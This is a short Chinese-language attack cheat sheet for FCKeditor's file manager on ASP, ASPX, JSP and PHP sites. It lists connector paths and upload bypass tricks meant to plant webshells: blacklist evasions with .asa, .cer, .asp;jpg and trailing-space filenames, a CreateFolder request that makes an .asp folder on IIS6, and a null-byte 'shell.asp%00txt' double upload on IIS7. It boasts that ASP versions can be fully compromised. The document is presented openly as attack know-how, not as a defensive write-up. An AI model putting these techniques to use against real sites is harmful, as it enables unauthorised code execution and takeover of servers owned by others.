=====================================================================================

asp

FCKeditor/editor/filemanager/browser/default/browser.html?type=(File|Image|Flash)
&connector=connectors/asp/connector.asp

asp一般是搭在windows主机上，webserver一般为IIS6/IIS7/IIS7.5。据我现在所知，asp版的fckeditor已经可以全秒了。

<2.4.x版本（也就是2.4.x及以下）的File参数时为黑名单验证，可以通过上传.asa、.cer、.asp;jpg（针对IIS6）。如果asa、cer不被解析，还可以传.asp[空格]。传的方法就是抓包然后在数据包里的文件名后填个空格。

2.5.x和2.6.x：如果是IIS6.0 ，可以通过突破变”.”为”_”限制创建.asp文件夹，代码如下：

Fckeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=File&
CurrentFolder=%2Fshell.asp&NewFolderName=z.asp

复制代码然后往这个文件夹里传jpg，这个不多说了。

如果是IIS7及以上，这种方法就傻逼了。这个时候可以借助刚爆出来的那种方法，先传shell.asp%00txt，然后再传一次。

至此，asp版本已经全秒了。

=====================================================================================

aspx

FCKeditor/editor/filemanager/browser/default/browser.html?type=(File|Image|Flash)
&connector=connectors/aspx/connector.aspx

低版本同ASP版，2.6.x用刚爆出来的二次上传已经不好使了，不过新建test.asp的文件夹还可以使。
一般IIS6.0会支持asp，可以先传个asp上去，然后再XX。

=====================================================================================

jsp

FCKeditor/editor/filemanager/browser/default/browser.html?type=(File|Image|Flash)
&connector=connectors/jsp/connector.jsp



php

FCKeditor/editor/filemanager/browser/default/browser.html?type=(File|Image|Flash)
&connector=connectors/php/connector.php

version

/fckeditor/editor/dialog/fck_about.html